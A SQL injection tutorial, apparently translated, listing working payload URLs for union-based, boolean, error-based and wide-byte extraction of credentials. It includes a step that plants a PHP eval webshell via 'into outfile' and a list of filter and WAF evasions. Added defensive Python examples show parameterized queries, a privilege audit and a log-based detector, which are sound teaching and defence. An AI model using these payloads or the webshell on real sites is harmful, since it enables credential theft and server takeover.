On the web side this looks roughly like http:///news.php?id=1; the injected parameter id is numeric, so it is called a numeric injection point. The underlying SQL statement is roughly select * from <table> where id=1. The combined injected SQL statement is: select * from news where id=1 and 1=1
String injection point
On the web side this looks roughly like http:///news.php?name=admin; the injected parameter name is a string, so it is called a string injection point. The underlying SQL statement is roughly select * from <table> where name='admin'. Note the extra quotes. The combined injected SQL statement is: select * from news where chr='admin' and 1=1
The quote in the input closes the original single quote: chr='admin' union select 1,2,3,4 and '1'='1 ====> chr='admin' (closes the preceding single quote) union select 1,2,3,4 and '1'='1'
Search injection point
This is a special class of injection. It arises when the search parameter is not filtered during a data search; usually the URL contains "keyword=<term>", although some sites do not show it in the URL and submit it straight from the search form. The SQL statement submitted through such an injection point is roughly: select * from <table> where <column> like '%<keyword>%'. The combined injected SQL statement is: select * from news where search like '%测试 %' and '%1%'='%1%'. Another input of the same shape: 测试%' union select 1,2,3,4 and '%'='
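The three statement shapes above (numeric id, quoted string, LIKE search) are what make these injection points possible, and all three are closed by binding the value as a parameter. The following is an added example, not code from the original notes: it builds each query by concatenation and by parameter binding and runs both against a constructed table. sqlite3 stands in for MySQL so it runs offline; the table name news and the columns id, name and search are assumptions taken from the statement templates above. The LIKE case also shows the detail a parameter alone does not cover: % and _ are pattern metacharacters, so they are escaped and an ESCAPE clause is declared.

```python
# Added example (not from the original notes): vulnerable concatenation vs. bound
# parameters for the numeric, string and LIKE-search injection points.
# sqlite3 is a stand-in for MySQL; the table and rows are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, name TEXT, search TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "admin", "public story"), (2, "guest", "internal memo"), (3, "ops", "50% discount")],
    )
    return conn


def unsafe_query(conn, kind: str, value: str) -> list:
    """Concatenates the request value straight into the statement, like the pages above."""
    if kind == "numeric":
        sql = "SELECT id FROM news WHERE id=" + value
    elif kind == "string":
        sql = "SELECT id FROM news WHERE name='" + value + "'"
    else:  # search
        sql = "SELECT id FROM news WHERE search LIKE '%" + value + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def escape_like(pattern: str, esc: str = "\\") -> str:
    """A bound parameter keeps the value out of the SQL grammar, but LIKE still
    interprets % and _ inside the value; escape them and declare the escape char."""
    return pattern.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def safe_query(conn, kind: str, value: str) -> list:
    """Same three queries with the value bound as a parameter; it is data, never SQL."""
    if kind == "numeric":
        sql, params = "SELECT id FROM news WHERE id=?", (int(value),)  # non-integer -> ValueError
    elif kind == "string":
        sql, params = "SELECT id FROM news WHERE name=?", (value,)
    else:
        sql = "SELECT id FROM news WHERE search LIKE ? ESCAPE '\\'"
        params = ("%" + escape_like(value) + "%",)
    return sorted(row[0] for row in conn.execute(sql, params))


def demo() -> dict:
    conn = make_db()
    results = {
        # numeric point: the appended predicate widens the result set
        "numeric_unsafe": unsafe_query(conn, "numeric", "1 or 1=1"),
        # string point: the input's quote closes the literal, as in chr='admin' ... '1'='1
        "string_unsafe": unsafe_query(conn, "string", "admin' or '1'='1"),
        # search point: close the '%...%' pattern and append a tautology
        "search_unsafe": unsafe_query(conn, "search", "zzz%' or '%1%'='%1"),
        "string_safe": safe_query(conn, "string", "admin' or '1'='1"),
        "search_safe": safe_query(conn, "search", "zzz%' or '%1%'='%1"),
        # a literal % in the search term matches only as text once escaped
        "percent_safe": safe_query(conn, "search", "50%"),
    }
    try:
        results["numeric_safe"] = safe_query(conn, "numeric", "1 or 1=1")
    except ValueError:
        results["numeric_safe"] = "rejected"
    return results


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The three unsafe calls return every row because the injected predicate is evaluated as SQL; the bound versions return nothing for the same input (the numeric one refuses it outright), and the escaped LIKE returns only the row that actually contains "50%".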
1. Identify the injection point: http://www./index.php?id=1' gives an error; http://www./index.php?id=1 and 1=1 is normal; http://www./index.php?id=1 and 1=2 is abnormal
2. Determine the column count: http://www./index.php?id=1 order by 1
3. Determine the displayed positions: http://www./index.php?id=1 and 1=2 union select 1,2,3 or http://www./index.php?id=-1 union select 1,2,3
4. Get the current database: http://www./index.php?id=1 and 1=2 union select 1,2,database()
5. Get the table names in the database: http://www./index.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
6. Get the column names: http://www./index.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'
8. Get the data from the table: http://www./index.php?id=1 and 1=2 union select 1,2,group_concat(username,' ',password) from security.users
Boolean injection
Boolean injection produces no error messages at all; the page has only two outcomes, normal and abnormal.
Function              Description
Length()              returns the length of a string
Substr(column,A,N)    extracts a substring
ascii()               returns the ASCII code of a character
limit(0,1)            starts at row 0 and takes 1 row
ord()                 returns the ASCII code of a single character
Boolean injection process (bool)
1. Append a quote to the parameter to provoke an error, then test with and 1=1# and and 1=2#: ?id=1' and 1=1# the page returns normally; ?id=1' and 1=2# the page returns abnormally
2. Determine the length of the database name: 1' and length(database())>=11-- page normal; 1' and length(database())>=13-- page normal; 1' and length(database())>=14-- page error; so the database name is 13 characters long
updatexml error-based injection
1. Try provoking an error with a single quote. 2. Get the database name: and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- (0x7e is the hex of the "~" character, used here as a delimiter)
3. Get the table names: ' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='<database name>' limit 0,1),0x7e),1)--
4. Get the column names: ' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='<database name>' and table_name='<table name>' limit 0,1),0x7e),1)--
5. Get the data: ' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--
extractvalue error-based injection
1. Get the database name: http://www./index.php?id=1 and extractvalue(1,concat(0x7e,(database())),0)#
2. Get the table names: http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)#
3. Get the column names: http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema='security' limit 1,1)),0)#
4. Get the data: http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select password from security.users limit 0,1)),1)
floor error-based injection process
floor is one form of error-based injection. The root cause is using rand() together with group by: rand() is evaluated more than once, which produces the error. floor(x) returns the largest integer not greater than x, e.g. floor(1.4) returns 1. rand() returns a random number between 0 and 1. The error is a duplicate primary key (duplicate entry). Whenever count, rand() and group by are used together, this duplicate-key error results.
1. Get the database name: http://www./index.php?id=1 and (select 1 from (select count(*),concat(database(),floor(rand()*2))x from information_schema.tables group by x)a)
2. Get the table names: http://www./index.php?id=1 and (select 1 from (select count(*),concat((select(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
3. Get the column names: http://www./index.php?id=1 and (select 1 from (select count(*),concat((select(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
4. Get the data: http://www./index.php?id=1 and (select 1 from (select count(*),concat((select username from cms.user limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
http://192.168.91.142/sqli/02.php?id=1' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3#
Statement processed by the backend:
Select * from user where id='1\' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
Wide-byte injection
http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
Statement processed by the backend:
Select * from user where id='1乘' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
2. Get the table names in the database
http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='cms' #
The single quotes around the database name are escaped, giving a syntax error, so convert the database name to hexadecimal
http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x6374667377696b69 #
3. Get the column names
http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x75736572 and table_schema=0x6374667377696b69 #
4. Get the data
http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,group_concat(username,0x2a2a2a,password),3 from user#
Functions such as addslashes filter the input, with the effect ?id='1\' : the single quote is escaped and cannot be closed. Wide-byte injection works because the database uses GBK encoding, in which the high byte � together with the \ forms one (traditional) Chinese character, so the single quote escapes the filter: �' and 1=1, �' order by 4
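The mechanism just described can be reproduced at the byte level, which also shows what the fix has to look like. The following is an added example, not code from the original notes: it applies addslashes-style byte escaping to a request value, decodes the resulting statement the way a GBK-configured connection would, and checks whether an unescaped quote survives inside the literal. The � in the notes stands for an unspecified high byte; 0xBF is used here as a constructed stand-in, and the table user and column id are taken from the backend statement shown above. The charset-aware variant decodes the input strictly in the connection charset first, so a lone lead byte followed by a quote is rejected instead of being turned into a valid double-byte character.

```python
# Added example (not from the original notes): the addslashes()/GBK failure at byte level,
# and a charset-aware alternative. Input bytes are constructed; 0xBF is a stand-in high byte.
import re

CHARSET = "gbk"   # assumed: the database connection is configured for GBK, as in the notes
PREFIX = b"SELECT * FROM user WHERE id='"


def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query_naive(user_input: bytes) -> bytes:
    """What the vulnerable backend sends: addslashes() output glued into a quoted literal."""
    return PREFIX + addslashes_bytes(user_input) + b"'"


def literal_breaks_out(query: bytes) -> bool:
    """Decode the statement as the GBK server would and report whether an unescaped quote
    appears inside the literal, i.e. whether the request's quote survived escaping."""
    text = query.decode(CHARSET, errors="replace")
    inner = text[len(PREFIX):-1]          # the literal between the two quotes (PREFIX is ASCII)
    return re.search(r"(?<!\\)'", inner) is not None


def build_query_charset_aware(user_input: bytes) -> bytes:
    """Decode the input strictly in the connection charset before escaping. b'\\xbf' followed
    by 0x27 is not valid GBK, so it is rejected rather than escaped into a double-byte char;
    escaping then operates on characters, not bytes. Bound parameters avoid the problem
    entirely and remain the preferred fix."""
    try:
        text = user_input.decode(CHARSET)
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid in the connection charset") from exc
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return PREFIX + escaped.encode(CHARSET) + b"'"


def charset_aware_rejects(user_input: bytes) -> bool:
    """True if the charset-aware builder refuses the input."""
    try:
        build_query_charset_aware(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for sample in (b"1'", b"1\xbf'"):
        q = build_query_naive(sample)
        print(sample, "naive:", q, "breaks out:", literal_breaks_out(q),
              "charset-aware rejects:", charset_aware_rejects(sample))
```

With a plain 1' the backslash stays in front of the quote after decoding; with the high byte in front, the byte pair 0xBF 0x5C decodes to a single character and the quote is left unescaped. Setting the connection charset explicitly (for example mysqli::set_charset in PHP) so that escaping and the server agree on the encoding addresses the same mismatch.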
1.3 Now we determine the closing characters. Input http://www./sqli/Less-7/?id=1' and 1=1 #: the response is abnormal
Input http://www./sqli/Less-7/?id=1') and 1=1 #: the response is abnormal
Input http://www./sqli/Less-7/?id=1')) and 1=1 #: the response is normal
Input http://www./sqli/Less-7/?id=1')) and 1=2 #: the response is abnormal
1.4 Now we use what we learned above to write a one-line webshell file. We input: http://www./sqli/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST[a]);?>' into outfile 'c:/www/2.php'#. Although an error is displayed, the file was in fact written.
1.6 Next we read the file. We input: http://www./sqli/Less-7/?id=1')) union select 1,2,load_file("C:/WWW/2.php") into outfile 'C:/WWW/3.php'#. Although it errored, we still made it read the content of 2.php and write it out as 3.php
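The into outfile and load_file steps above only work when the database account holds the FILE privilege and secure_file_priv does not restrict file access. The following is an added example, not code from the original notes: a small audit check that parses the output of SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS and reports the two conditions. The account name webapp, the schema cms and the command output are constructed; in MySQL an empty secure_file_priv means unrestricted, NULL disables import/export, and a path confines it to that directory.

```python
# Added example (not from the original notes): audit the two server-side preconditions of
# the file write/read steps. Command output below is constructed sample text.
import re

WEAK_VARS = """+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+"""
WEAK_GRANTS = "GRANT SELECT, INSERT, UPDATE, FILE ON *.* TO 'webapp'@'localhost'"

HARD_VARS = """+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+"""
HARD_GRANTS = "GRANT SELECT, INSERT, UPDATE ON `cms`.* TO 'webapp'@'localhost'"


def parse_secure_file_priv(show_variables_output: str):
    """Return the secure_file_priv value ('' = unrestricted, 'NULL' = disabled, else a path),
    or None if the variable is not in the output."""
    m = re.search(r"\|\s*secure_file_priv\s*\|\s*(.*?)\s*\|", show_variables_output)
    return m.group(1) if m else None


def account_has_file_privilege(show_grants_output: str) -> bool:
    """FILE is a global privilege, so only GRANT ... ON *.* lines matter; ALL PRIVILEGES
    on *.* includes it."""
    for line in show_grants_output.splitlines():
        m = re.match(r"\s*GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO", line, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs:
            return True
    return False


def assess(show_variables_output: str, show_grants_output: str) -> list:
    """List the findings that would let a UNION-based injection write or read files."""
    findings = []
    sfp = parse_secure_file_priv(show_variables_output)
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE / load_file() may use any "
                        "path the server process can write or read")
    elif sfp not in (None, "NULL"):
        findings.append("secure_file_priv limits file operations to %s; make sure the web "
                        "root is not inside it" % sfp)
    if account_has_file_privilege(show_grants_output):
        findings.append("application account holds FILE (or ALL PRIVILEGES) on *.*; revoke it")
    return findings


if __name__ == "__main__":
    print("weak:", assess(WEAK_VARS, WEAK_GRANTS))
    print("hardened:", assess(HARD_VARS, HARD_GRANTS))
```

The weak configuration yields both findings; the hardened one (secure_file_priv = NULL, no FILE grant, privileges scoped to the application schema) yields none, which is the state that makes the 1.4 and 1.6 steps fail regardless of the injection itself.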
3. Newline bypass (each keyword on its own line):
http://www./index.asp?Id=1
and
1=2
union
select
1,2,database()
4. Parenthesis bypass, using the MySQL feature id=1=1: http://www./index.asp?Id=1=(ascii(mid(database() from (1)))=99)
5. Backtick ` bypass
Keyword filtering
6. Inline comment /*!...*/ bypass (randomcomments.py); use /**/ to split keywords: http://www./index.asp?Id=1 and 1=2/*!union*//*!select*/1,2,database()
7. Case variation bypass: http://www./index.asp?Id=1 and 1=2 union seleCt 1,2,database()
8. Doubled keyword bypass: http://www./index.asp?Id=1 and 1=2 union seselectlect 1,2,database()
9. Double URL-encoding bypass (chardoubleencode.py); single encoding charencode.py: http://www./index.asp?Id=1 and 1=2 union se%6cect 1,2,database()
10. Hexadecimal encoding bypass: http://192.168.91.142/sqli/02.php?id=1�' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x6374667377696b69 #
11. Unicode encoding bypass, recognised by IIS (charunicodeencode.py): http://www./News.asp?SortID=1&ItemID=46 and 0 < (select top 1 name from sys.databases)
12. ASCII encoding bypass for the case where single quotes are escaped (… is URL-encoded as +): http://www./News.asp?SortID=1&ItemID=46 and 0 < (select top 1 name from sec.dbo.sysobjects where xtype='U' and name not in(char(101) char(105) char(109) char(115) char(95) char(67) char(97) char(115) char(101) char(80) char(114) char(111)))
13. like or in instead of = (equaltolike.py): http://www./News.asp?SortID=1 and 1 like 1
14. from ... for to bypass the comma: Select substr(database(),1,1) becomes Select substr(database() from 1 for 1)
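Each bypass in the list above targets a filter that matches the raw request string. A detector that first normalises the request (decodes URL encoding twice, unwraps /*!...*/ and /**/ comments, folds case, collapses newlines and other whitespace, strips backticks and folds doubled keywords) and only then matches signatures sees the same plain SQL for all of them. The following is an added example, not code from the original notes, and it serves the union-based, boolean, error-based, file-access and wide-byte sections earlier in these notes as well as this list: it runs that normalisation over constructed web-server access log lines and reports which payload families each request matches. The log format, the client address and the 0xBF high byte in the wide-byte line are constructed; the request shapes mirror the ones shown in the notes.

```python
# Added example (not from the original notes): normalise request query strings to undo the
# evasions listed above, then match the injection families from these notes against
# constructed access log lines.
import re
from urllib.parse import unquote_to_bytes

KEYWORDS = ("union", "select", "from", "where", "and", "or")

SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s*(?:all\s+)?\bselect\b"),
    "schema_probe": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "boolean_pair": re.compile(r"\b(?:and|or)\b\s*'?\d+'?\s*=\s*'?\d+"),
    "error_based":  re.compile(r"\b(?:updatexml|extractvalue)\s*\(|\bfloor\s*\(\s*rand\s*\("),
    "file_access":  re.compile(r"\binto\s+(?:out|dump)file\b|\bload_file\s*\("),
    "db_function":  re.compile(r"\b(?:database|user|version)\s*\(\s*\)"),
    "hex_literal":  re.compile(r"=\s*0x[0-9a-f]{6,}"),
    "char_chain":   re.compile(r"(?:\bchar\s*\(\s*\d+\s*\)\s*){3,}"),
}
WIDE_BYTE = re.compile(rb"[\x81-\xfe]'")      # high lead byte glued to a quote (GBK trick)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def collapse_doubled(s: str) -> str:
    """seselectlect -> select: fold a keyword written inside its own spelling, repeatedly,
    which is what a filter that deletes the keyword once would produce."""
    changed = True
    while changed:
        changed = False
        for kw in KEYWORDS:
            for i in range(1, len(kw)):
                doubled = kw[:i] + kw + kw[i:]
                if doubled in s:
                    s = s.replace(doubled, kw)
                    changed = True
    return s


def normalize(query: str):
    """Return (normalised text, wide-byte flag) for a raw query string."""
    raw = unquote_to_bytes(query.replace("+", " "))   # first decode; + is a space in a query string
    raw = unquote_to_bytes(raw)                         # second pass undoes double encoding
    wide = WIDE_BYTE.search(raw) is not None            # checked on bytes, before any text decoding
    s = raw.decode("latin-1").lower()                   # byte-preserving, case-folded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s)          # /*!union*/ and /*!50000union*/ -> union
    s = re.sub(r"/\*.*?\*/", " ", s)                    # /**/ keyword splitters
    s = re.sub(r"[\x00-\x20]+", " ", s)                 # newlines, tabs, NUL -> one space
    s = s.replace("`", "")                              # backticks around identifiers
    return collapse_doubled(s), wide


def classify(query: str) -> list:
    s, wide = normalize(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(s)]
    if wide:
        hits.append("wide_byte")
    return hits


def scan_log(lines: list) -> list:
    """(query string, signature names) for every request line that triggers a signature."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = m.group(1).split("?", 1)[1]
        hits = classify(query)
        if hits:
            findings.append((query, hits))
    return findings


# Constructed access log; request shapes follow the notes (plain union, inline comments,
# doubled keyword, double URL encoding, updatexml, wide byte + hex literal, outfile/load_file).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%27%20and%201=2%20union%20select%201,2,database() HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%201=2/*!union*//*!select*/1,2,database() HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20and%201=2%20union%20seselectlect%201,2,database() HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%20and%201=2%20union%20se%256cect%201,2,database() HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)-- HTTP/1.1" 500 128',
    '192.0.2.10 - - [01/Jan/2024:10:00:07 +0000] "GET /sqli/02.php?id=1%bf%27%20and%201=2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x636d73%20%23 HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?id=1%27))%20union%20select%201,2,load_file(%22C:/WWW/2.php%22)%20into%20outfile%20%27C:/WWW/3.php%27%23 HTTP/1.1" 500 128',
]

if __name__ == "__main__":
    for query, hits in scan_log(SAMPLE_LOG):
        print(hits, query)
```

The first log line is a legitimate request and produces no finding; lines 2 to 5 are the same union payload written four different ways and all collapse to the same three signatures, which is the property a filter on the raw string lacks. The wide-byte flag is computed on the decoded bytes before the text is lowered, because the high byte is lost once the request is treated as a string.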